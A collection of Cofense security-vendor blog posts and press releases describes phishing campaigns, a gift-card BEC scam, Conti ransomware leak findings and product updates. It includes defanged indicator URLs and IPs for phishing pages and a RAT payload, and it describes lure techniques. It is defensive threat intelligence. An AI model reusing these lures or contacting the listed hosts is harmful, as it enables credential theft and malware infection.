Energy/Infrastructure Enterprises Targeted by HTML Phishing Campaign

By Matthew Dortch, Cofense Phishing Defense Center

Commonly used, yet still effective tactics, are being exploited by threat actors to get phish into user’s email inboxes. The Cofense Phishing Defense Center (PDC) has observed a phishing campaign targeting energy/infrastructure companies by utilizing HTML attachments containing credential stealing forms. This is another example of how Cofense observes phishing campaigns across various customers and industries.

Figure 1: Email Body

The email shown in Figure 1, poses as a notification of a legitimately received file presented as a transcript. The threat actor leveraged a simple transcript alert theme. Specific details added in the email such as the date and time the attachment was received may boost the authenticity of the phish. To portray as being from an internal source, the threat actor spoofed the organization by using “Shared-Files via ”, however, the email address, with a Japanese domain, is still clearly displayed.

Figure 2: Phishing Page

After downloading and opening the HTML file, users are shown a Microsoft login form with some type of document masqueraded behind, shown in Figure 2. The document behind appears to be an invoice with financial information on it that can only be accessed by logging in with a Microsoft account. This tactic alone was most likely an indicator to the recipient that the email content didn’t align with what was being presented on the landing page, leading them to quickly report the suspicious email. The recipient’s email address is automatically displayed with just the password field empty, as the threat actor scripted the HTML file to have to pass the recipient’s email address.

Since one of these customers hit by this campaign leverages Cofense Vision to automatically quarantine emails, the customer was able to mitigate the email from 40 unique inboxes, reducing the risk of user interaction to give away credentials.

Cofense continues to observe HTML / HTM attachments as the top attachment type making it to the inbox, leading to credential theft. Cofense Vision sits post SEGs and offers an effective and unique phishing defense by using a network of people reporting suspicious emails that allows one email to be used to mitigate an attack across an entire organization. Reach out to learn more.

Indicators of Compromise IP
hXXps://warrenlawomaha[.]com/scn/hope.php 103.125.218.44

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. Past performance is not indicative of future results.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

BEC: CEO Gift Card Scams

Author: Tonia Dudley

Over the years we’ve seen the evolution of topics and content related to Business Email Compromise, CEO Fraud or whatever you want to label this category of phishing. We like to just call it what it is – conversational phishing – no links or attachments – just trying to get the recipient to interact in a conversation leading to a task. The threat actor is constantly adjusting their lure and context to avoid any AI/ML detection configuration. As of late their tactic is to quickly move the conversation to another communication channel – SMS or WhatsApp for example.

I was recently catching up with a friend and as we wrapping up our conversation, she said “oh speaking of cybersecurity, I had this really strange email yesterday.” I knew exactly where she was going with this conversation and just allowed her to tell me her story. As you read her story, keep in mind that she is a C-Suite executive reporting directly to the CEO, that has only been in her role for a month. It went something like this:

As she was wrapping up her Friday, she did one last check of her email on another platform used by a peer organization. She saw an email from her CEO asking for her cell. At first glance, she knew he was on a personal vacation and maybe he only took his personal cell with him, and he didn’t have my cell phone number. She quickly reached out to her peer, but no response – it was late Friday afternoon – nor did Mark respond when she texted him.

Figure 1: Phishing Email

Since she couldn’t get ahold of anyone to validate, she responded and began the text exchange in Figures 2-5. And then headed off to buy the requested gift cards. As you can see in the exchange, it’s clear she thought she was chatting with Mark and making every effort to meet the demands of the request. As she made the final step to text a picture of the code, she decided to do one last check with her CEO. It was then that she decided to try one last time to call him directly. He explained to her that he is on vacation and would never ask her to buy gift cards. While she had scratched off the cover to get the code – in the parking lot after making the purchase – she was able to walk back into the store and get a refund of her personal money.

 

 

Figure 2-5: SMS Message Exchange

In this scenario, Ruth was lucky to be able to get a refund for the purchase she just made, many are not. Because the dollar amount of these losses tends to be low cost, very rarely are these reported to law enforcement.

In our Annual Report webinar series, we break down the various types of tactics seen in these scams and how these have evolved. We also cover some ways that you can protect your organization by making your employees aware of these tactics. On May 25, we will be providing in-depth insights on BEC and best practices on how to educate your employees to prevent situations like the above.

Cofense Annual Phishing Report Highlights 10 Point Increase in Credential Phishing

67% of all phishing emails observed are credential phishing; new report highlights ways that traditional technology can’t keep up with phishing tactics

March 30, 2022 08:30 AM Eastern Daylight Time

LEESBURG, Va.–(BUSINESS WIRE)–Cofense®, the leading provider of Phishing Detection and Response (PDR) solutions, today released its 2022 Annual State of Phishing Report, which sheds light on the value of human reporting and the downfall of relying too heavily on technology controls to prevent phishing. As observed by the Cofense Phishing Defense Center (PDC), phishing attacks containing malicious URLs were four times more likely to bypass secure email gateways than those with attachments.

Cofense has equipped more than 32 million people in organizations across the globe to report suspicious emails through Cofense Reporter™, an easy to use, one-click email toolbar button. As a result, Cofense has access to a dynamic and vast dataset of advanced phishing threat intelligence – with more visibility into the actionable phishing emails that are bypassing secure email gateways and hitting user inboxes than any other security company.

Key insights from Cofense’s research and analysis from 2021 include:

  • Credential phishing continues to be the top threat facing organizations, increasing 10 percentage points since 2020
    • 67% of all phishing emails observed are credential phishing
    • 52% of all credential phish were branded as Microsoft
  • Cofense observed nearly 100 unique malware families, representing the complicated landscape of distinct threats organizations need to keep up with
  • The healthcare industry continues to be the top target of business email compromise (BEC) attacks
    • 16% of malicious emails found in healthcare environments were BEC attacks
  • Threats continue to break through into environments protected by email security vendors
    • Of the Indicators of Compromise (IOCs) analyzed by Cofense’s Phishing Defense Center, 80% contained malicious URLs found in the body of the email, while 20% utilized nefarious attachments.
  • Organizations are increasingly aligning their employee simulation training with real threats known to be targeting their organization
    • Cofense saw a 7-point increase in simulations based on credential phishing in 2021

“Early on in our journey as a company, we grew our focus from solely security awareness simulation training to more broadly addressing the real phishing threats facing organizations. We knew solving these problems would require continuous innovation, and in 2021 we were proud to take our multi-layered email security architecture to a whole new level through the acquisition of Cyberfish and the launch of brand-new product capabilities,” said Aaron Higbee, co-founder and Chief Technology Officer, Cofense.

“If there is anything I hope the industry takes away from Cofense’s 2022 Annual State of Phishing Report, it is that threat actors are innovating but SEGs are not, and well-conditioned users report real phish. Cofense is the only email security company that detects phish that have bypassed all major SEG vendors. I believe the number of real phish, reported by real users, found in all major SEG environments speaks for itself,” added Higbee.

Report Available Now

To download the Cofense Annual State of Phishing Report, or to register for the free Cofense webinar taking place today, March 30 at 1pmET, visit https://cofense.com/annualreport.

About Cofense

Cofense® is the leading provider of phishing detection and response solutions. Designed for enterprise organizations, the Cofense Phishing Detection and Response (PDR) platform leverages a global network of over 32 million people actively reporting suspected phish, combined with advanced automation to stop phishing attacks faster and stay ahead of breaches. When deploying the full suite of Cofense solutions, organizations can educate employees on how to identify and report phish, detect phish in their environment and respond quickly to remediate threats. With seamless integration into most major TIPs, SIEMs, and SOARs, Cofense solutions easily align with existing security ecosystems. Across a broad set of Global 1000 enterprise customers, including defense, energy, financial services, healthcare and manufacturing sectors, Cofense understands how to improve security, aid incident response and reduce the risk of compromise. For additional information, please visit www.cofense.com or connect with us on Twitter and LinkedIn.

Phishing Takeaways from the Conti Ransomware Leaks – Part 1

Author: Brad Haas

Conti is one of the most prolific ransomware operations in the threat landscape today. In a recent act of retaliation against Conti’s leaders for their support of Russia, an anonymous person leaked documentation and internal chat logs from the group. This blog post series covers important phishing-related takeaways Cofense Intelligence analysts discovered in the leaks. In Part 1, we discuss the background of the leaks, Conti’s segmentation of the attack chain, and how Conti operators use OSINT to select and harass their targets.

Background

A day after Russia began air strikes and ground invasion into Ukraine, Conti posted a statement of support for Russia on its public website. Although the group attempted to distance itself from the Russian government, the statement threatened retaliation if Western entities “attempt to target critical infrastructure in Russia or any Russian-speaking region of the world.” Two days later, an anonymous pro-Ukraine Twitter account published a large “leak” of Conti’s internal documentation, program code, and chat logs involving Conti operators and their associates. The leaked chats include Conti’s private Jabber and Rocket Chat instance, as well as chat logs from the TrickBot forums. They span most of Conti’s history, with logs from June to November 2020 and from January 2021 to March 2022. We examined the leaked information and identified several key takeaways for the phishing threat landscape.


“ContiLeaks” tweets supporting Ukraine and posting a batch of leaked files.

Conti Intensely Favors Segmentation of the Attack Chain

In September 2021 we published a Strategic Analysis report to Cofense Intelligence customers, showing the significance of phishing and intermediate malware in ransomware attacks. Successful ransomware groups choose not to expend resources on scattered campaigns limited to encrypting only individual workstations that belong to individually compromised victims. Instead, they prefer to carefully select ransomware targets from organizations that have been compromised through phishing attacks against individual employees, or that can be compromised by other intrusion methods. They use any footholds in a network to perform reconnaissance and evaluate the viability and value of a target. If the effort seems to be worthwhile, they perform lateral movement to maximize the volume of data and systems they can ransom.

The Jabber chat leaks show that the Conti threat group fully embraced this approach. Reconnaissance experts associated with the group search for companies with indications of revenue exceeding a certain threshold and identify individual targets. For initial exploitation, they pay operators of other malware like TrickBot and Emotet to conduct phishing campaigns and establish footholds in the target organization. Conti managers distribute those footholds to a team of hackers who specialize in expanding access in remote networks and locating valuable data.

Beyond using specialists for each stage of attack, Conti’s leadership showed willingness to pay for sophisticated tools. They gave their reconnaissance staff access to business information services like ZoomInfo, SignalHire, and Crunchbase Pro. Their extensive work with TrickBot eventually led them to absorb its developers into their own team, and they influenced Emotet’s return to action after its 2021 takedown by law enforcement. For their intrusion team, they illicitly acquired access to Cobalt Strike licenses. The investments appear to have paid off: according to blockchain analysis group Chainalysis, Conti’s cryptocurrency revenue in 2021 alone was estimated at $180 million.

Conti Uses OSINT Research for Both Target Selection and Harassment

Conti’s OSINT researchers play an important role during multiple stages of an attack. Before infection, they help to identify target organizations (ones that are likely to be willing and able to pay large ransoms). Team members aggregate data from a variety of sources in order to present summaries, including company contact information, social media pages, industry, revenue, number of employees, and even website popularity ranking. For targeted organizations, they find contact information for potential phishing victims.

Once the ransomware has been successfully deployed and a victim organization has contacted Conti, the researchers identify influential figures associated with the company as targets for harassment. Conti’s negotiators reach out to these people to apply additional pressure to pay the ransom. In one case, a researcher listed two directors and two vice presidents within a victim organization, including multiple phone numbers for each one, and notes from the first time they had attempted to call. To create more pressure in instances where companies refuse to negotiate, the researchers go outside the organization and identify board members or investors as targets.

Stay tuned for Part 2, which covers Conti’s collaborations with other malware operators.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. Past performance is not indicative of future results.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Cofense Named to JMP Securities Elite 80 List of Hottest Cybersecurity Companies

Cofense was recently included in the JMP Securities Elite 80, a list of the hottest privately held cybersecurity and IT infrastructure companies in 2022. We are proud to have been featured on this list each of the last 4 years, during a time in which our company has evolved profoundly – both our overall brand, and the technology solutions we bring to market.

As noted by the JMP Securities Elite 80 authors, “A key theme that became apparent in the pandemic was that the role of IT infrastructure and cybersecurity have rapidly grown more critical and fast changing. Given the rapid paradigm shift in the way that society is adopting new technologies, we believe the competitive advantage of being a nimble and innovative technology vendor is even more powerful than in the past.”

At Cofense, we couldn’t agree more. Innovation is core to our mission, and continues to be a driving force for significant product and service updates.

Early on in our journey as a company, we grew our focus from solely security awareness simulation training to more broadly addressing the real phishing threats facing organizations. In early 2018, 10 years after our co-founders first registered the company domain with GoDaddy, we rebranded from PhishMe to Cofense. Fast forward to 2021, we recognized that solving the problems we originally set out to address would require continuous innovation. As a result, we were proud to take our multi-layered email security architecture to a whole new level through the acquisition of Cyberfish and the launch of brand-new product capabilities.

Today, Cofense has equipped more than 32 million people in organizations across the globe to report suspicious emails through Cofense Reporter™, an easy to use, one-click email toolbar button that gives Cofense access to a vast dataset of advanced phishing threat intelligence and more visibility into the actionable phishing emails that are bypassing secure email gateways (SEGs) and hitting user inboxes than any other security company.

“Every day, our team analyzes real phish that land in the inboxes of real people, and we are able to back up what we believe wholeheartedly – which is that conditioned users report real phish. We recently published our 2022 Annual State of Phishing Report, which sheds light on the value of human reporting and the downfall of relying solely on technology controls to prevent phishing. We are committed to helping organizations succeed at a layered phishing defense strategy that encompasses machine learning and crowd-sourced human intelligence for defending against the threats that continue to adapt,” said Cofense co-founder and CEO, Rohyt Belani.

The full Elite 80 report from JMP Securities highlights some of the most interesting and strategically positioned private companies in the industry. “We are honored to be listed among these other cybersecurity brands in the 2022 Elite 80, and look forward to the strides our industry will make in 2022,” added Belani.

About Cofense

Cofense® is the leading provider of phishing detection and response solutions. Designed for enterprise organizations, the Cofense Phishing Detection and Response (PDR) platform leverages a global network of over 32 million people actively reporting suspected phish, combined with advanced automation to stop phishing attacks faster and stay ahead of breaches. When deploying the full suite of Cofense solutions, organizations can educate employees on how to identify and report phish, detect phish in their environment and respond quickly to remediate threats. With seamless integration into most major TIPs, SIEMs, and SOARs, Cofense solutions easily align with existing security ecosystems. Across a broad set of Global 1000 enterprise customers, including defense, energy, financial services, healthcare and manufacturing sectors, Cofense understands how to improve security, aid incident response and reduce the risk of compromise. For additional information, please visit www.cofense.com or connect with us on Twitter and LinkedIn.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. Past performance is not indicative of future results.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Cofense Triage and Vision Updates Bring a Double Dose of Efficiency Improvements to Email Security

Technology isn’t perfect – emails are going to get past existing controls like secure email gateways (SEGs) and make it into the inboxes of unsuspecting employees. It’s then up to operations and response teams to quickly validate and prioritize malicious emails, and ultimately remove those threats from the inbox. With Cofense Triage and Cofense Vision, organizations complete processes in minutes that previously took days or even weeks. This week, we’re giving organizations multiple reasons to celebrate, as both Triage 1.24 and Vision 2.2 are now available and introducing the following new capabilities:

  • Playbooks in Triage to bring automation of workflows to new heights
  • Triage Tag Manager simplifies the auditing and clean-up of existing tags
  • Ensure full organization-wide quarantine is successful with expanded URL unwrapping support in Vision

Keep reading to learn more!

Let’s start with Triage.

Introducing Playbooks: Supercharging Automation in Triage

Cofense Triage 1.24 is building the framework for an improved way to implement and manage automated workflows. Over the next few months, current methods for handling repeatable processes in Triage will be replaced with a more efficient and robust way of automating processes and communication related to email security using Playbooks.

With the release of Playbooks in Triage 1.24, the following processes can now be completed with the click of a button:

  • communicate across multiple teams with different notifications and messages
  • categorize reported emails based on specific characteristics
  • remove existing tags and add new ones for better grouping and organization
  • send personalized responses to different reporter groups – including VIPs that may exist such as executives or high target individuals

With Playbooks, set up automated workflows that can turn follow-up for specific attack types into easily repeatable processes.

Easily Categorize and Navigate Through Related Material in Triage with a Robust Tag Manager

All from a single location, manage the tags you’re applying to reports, related reported emails, and comments left on reports and threat indicators. On this page, you can see how many times (and where) a tag is used regardless of its context in Triage allowing you to identify trends and popular topics. You can also rename, merge, and delete tags. And don’t worry, everything is documented as it should be in an audit log so you can keep a close eye on changes.

Time to move onto some exciting Vision updates.

Vision Adds Expanded Support for URL Wrappers for More Effective Search and Quarantine

Email security controls like SEGs rewrite most of the URLs sent via email to the inboxes they’re protecting – redirecting the user to their own, trusted server to buy them some time when it comes to understanding if the URL is malicious or not. This can be problematic, because wrapped malicious links are much harder for the user to identify. Users are trained to identify URLs that don’t lead to the destination that they should, but when all URLs are dominated by the SEG domain – ‘vendorname.com’ for example – it makes it increasingly difficult to spot those nefarious malicious links because everything looks similar and safe.

Furthermore, when a URL is determined malicious post-gateway, the next step is to pull it out of the inboxes that it’s sitting in. Pulling out wrapped, rewritten URLs can be tricky because they don’t match the identified malicious URL.

Vision 2.2 enables more thorough search and quarantine operations by adding support for URLs wrapped by the following providers:

  • Barracuda
  • FireEye
  • Proofpoint v3
  • Safe Links (Expanded Servers)
  • Zix (AppRiver/Edgepilot)

These providers join a growing list of others which Vision now offers URL Wrapping support for:

  • Cisco IronPort
  • Click Time
  • Mittum
  • Proofpoint v1 and v2
  • Safe Links

What’s mentioned above are just some of the highlights of these exciting product releases. To learn more about these and other capabilities and to see Triage or Vision in action, request a live demonstration today.

If you’re an existing Cofense operator, please reach out to your dedicated customer experience representative for more information.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. Past performance is not indicative of future results.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Three Highlights from the Cofense 2022 Annual State of Phishing Report 

Author: Tonia Dudley

I hope by now you’ve had a chance to download our Annual State of Phishing Report and listen to our webinar discussing the highlights. And if not, you can still download it and even sign up for one of our subsequent webinars highlighting key topics over the following months. A key topic that you will see throughout this report is that threat actors are still finding ways to navigate your Secure Email Gateway (SEG) to land in your users’ inbox, as evidenced by the graph below. This leads to the ultimate question, are your users prepared?

Key Takeaway #1: Credentials are in high demand.

As organizations continue to move to a cloud first strategy, it’s not surprising that we saw a 10-percentage point increase over the previous year for credential phish. Even more concerning is the number one brand leveraged in credential phish is Microsoft. Just as your users have figured out what alerts to expect when interacting with your Microsoft services, so too has the threat actor. Microsoft has made it clear that enabling Multifactor Authentication (MFA) significantly mitigates this threat. Full Enterprise deployment can be complex and time consuming, so take the time to prioritize your high-risk targets such as finance teams.

Key Takeaway #2: BEC didn’t improve.

When it comes to Business Email Compromise (BEC), we also saw an increase overall moving from 6% to 7% this year. We also see that the Healthcare industry still takes the lead at 17% of their reported emails categorized as BEC. When it comes to tactics used in this category, we observed direct deposit, gift cards and invoice scams. We’ll dig deeper into this in an upcoming webinar, but in the meantime, a simple message from your CEO to everyone in the organization – “I will never send you an email to go buy gift cards” is a great start!

Key Takeaway #3: Well-conditioned Users are Prepared!

When it comes to preparing your users for phish hitting their inbox, we saw a two-point increase in resiliency rate for simulation campaigns. What was even more exciting was to see organizations that have full phishing defense programs show a seven-point resiliency rate. It was also great to see that our PhishMe operators took notice of the current threat and used credential phishing in the campaign scenarios.

As you can see from the highlights above, phishing is not going anywhere. In fact, it’s quite the opposite; it’s only getting worse. Threat actors are continuing to use emerging tactics and techniques to bypass traditional email security solutions and the only way to stay ahead of the curve is to have a comprehensive phishing defense strategy. If you’re interested in a more detailed analysis of SEG effectiveness, BEC insights or catching ransomware at the phishing stage, sign up for our upcoming webinars.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. Past performance is not indicative of future results.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

COVID-19 Phish Targeting Companies

By Jer O’Donovan, Cofense Phishing Defense Center

COVID-19 has become an ever-present topic in our lives since the start of 2020. With this we’ve seen threat actors leveraging the pandemic with themes related to remote working, vaccination status, and back to the office surveys or general updates. This is on top of their usual business communications such as Microsoft Teams messages, deadline reminders, internal policy updates and more.

The Cofense Phishing Defense Center (PDC) has observed a phishing campaign whereby threat actors impersonate companies to send out fake COVID-19 forms. In Figure 1 we see a phish masquerading as a general office wide email claiming someone in the building has been infected with COVID-19 and asking to review the company policy.

Threat actors sometimes use legitimate but compromised email addresses to send out such phishing emails. In this case, searching the sender domain led us to a real German furniture store. They’ve spoofed the display name, “Human Resources” as the sender so the recipient will assume its legitimate.

Figure 1: Initial Email

When we read the content in the email it is professionally presented. The threat actor has purposely used generic language across the mail such as “Dear Colleagues” “Human Resources” and a lack of company logos. They also used “COVID-19 Positive Case-IMPORTANT” as the subject to grab attention.

All these tactics are used to convince the employee it’s a legitimate mail. This also indicates it is a mass email campaign sent to various companies as with generic language it doesn’t need to be tailored to each company.

Once you click the link, you’re taken to a Typeform page that prompt’s the user for their email as seen in figure 2. Typeform is used for online form building and surveys. Threat actors use these sites a lot as they can easily setup a phishing form quickly.

Figure 2: Initial Phishing Landing Page

Once their email address is submitted, they’re then prompted for their password as seen in figure 3.

Figure 3: Password Entry Form

The PDC also observed another COVID-19 related phishing campaign from the same sender asking the user to update their vaccination status. Instead of Typeform, the threat actor used Wufoo, another online form builder to phish the user’s information as seen in figure 4. However, this has been taken down.

Figure 4: Second Phishing Campaign

Figure 5: Fake Covid-19 Policy

If an employee was to fall for this phish the web page would redirect seamlessly to a compromised SharePoint hosting a fake COVID-19 policy as seen in figure 5, thereby deflecting suspicion. We’ve noticed with various types of phishing attempts that threat actors will redirect to seemingly non-malicious pages after the user has entered their details, sometimes the redirect pages are legitimate sites such as Microsoft’s.

For end-point teams under certain specific circumstances the blocking of a malicious sender address may be void. This would be the case with this sender address as the sender has been compromised and will need continued communication once their account has been secured.

Indicators of Compromise (IOCs) IP
hXXps://5g3poiiecwg[.]typeform[.]com/acknowledgement 104.18.26.71
104.18.27.71
hXXps://andy11[.]wufoo[.]com/forms/z1mh5ftj1a0115p/ 18.67.65.39
18.67.65.38

Malicious emails like this are on the rise it’s imperative that businesses are made aware of these so that they can put a procedure in place to stop these kinds of threats. With Cofense tools and services, malicious emails can be identified, and indicators of compromise (IOC)’s given and shared. Find out what we can do for your enterprise.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. Past performance is not indicative of future results.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

RAT Campaign Looks to take Advantage of the Tax Season

By Kyle Duncan and Dylan Main, Cofense Phishing Defense Center

Tax season can be a stressful time for many people, and it comes as no surprise that every year threat actors look to capitalize on this by using a variety of new tactics to exploit their targets’ accounts and systems. Some of these campaigns can be rather simple and easy-to-spot phish while others may have detailed designs and more thought put into them. The Phishing Defense Center (PDC) has identified such a tactic that spoofs the U.S. Internal Revenue Service (IRS) to download malware onto user systems. This campaign leverages Netsupport Manager, a troubleshooting and screen control program, as a malicious remote access trojan (RAT) the threat actor employs to remotely enter user systems. The PDC has seen tax related campaigns in the past that have been used to steal employee credentials; however this attack is unique in that it is installing malware.


Figure 1: Email Body

In Figure1, the threat actor is attempting to impersonate an IRS audit request for a new federal law affecting U.S.-based companies. The email prompts users to click on the button to fill out “Form 4721” and update their company’s assets for tax purposes. While the IRS requires Form 4720 for certain excise taxes on charities, Form 4721 doesn’t actually exist. The email body appears to be designed well but the email address of the sender is hosted in Brazil and not likely to be used by the IRS for official communication. These are both indicators that were spotted by a well-conditioned user who quickly reported. Once a user interacts with the email, they are redirected to a captcha at hXXps://irsbusinessaudit[.]net/captcha.php.


Figure 2: Captcha Page

As seen in Figure 2, users are prompted to enter the three-digit code to access the form. When “continue” is clicked, an XLL file is downloaded. Unlike most Excel files, these files are used by companies to add functionality. In this case, the XLL file reaches out to a second directory found at the irsbusinessaudit[.]net domain and downloads a ZIP file named “DROP.zip.” Once downloaded, the contents of the ZIP file are not automatically initiated, requiring further interaction with the user.


Figure 3: ZIP File

The contents of the ZIP file, seen in Figure 3, include all the necessary components to run Netsupport Manager. Netsupport Manager is an application typically used to give remote access to another machine. However, the main executable in the ZIP, client32[.]exe, was created just like any Netsupport binary and will check the location, via Netsupport Manager’s geolocation services, once initiated. However, a connection is then established with a threat actor-owned command-and-control (C2) server, instead of a legitimate IT service, which allows for remote access to the now-infected machine.

With tax season in full swing, sophisticated campaigns similar to this are dangerous to individuals as well as entire corporations. Remote access tools can be helpful, but, when used for nefarious crimes, they are extremely dangerous. Threat actors are always changing their tactics so malware can make it to the inbox of your users, even with a secure email gateway (SEG) installed and configured. Cofense products allow you quickly mitigate malicious emails that find their way to the inbox of users. With Cofense Managed Phishing Detection and Response, enterprises can have our full view of phishing attacks. Contact us to learn more.

Indicators of Compromise IP
hXXps://irsbusinessaudit[.]net/captcha.php 185.225.19.116
hXXps://irsbusinessaudit[.]net/DROP.ZIP 185.225.19.116
hXXp://45[.]76[.]172[.]113/fakeurl.htm 45.76.172.113

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats. Past performance is not indicative of future results.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.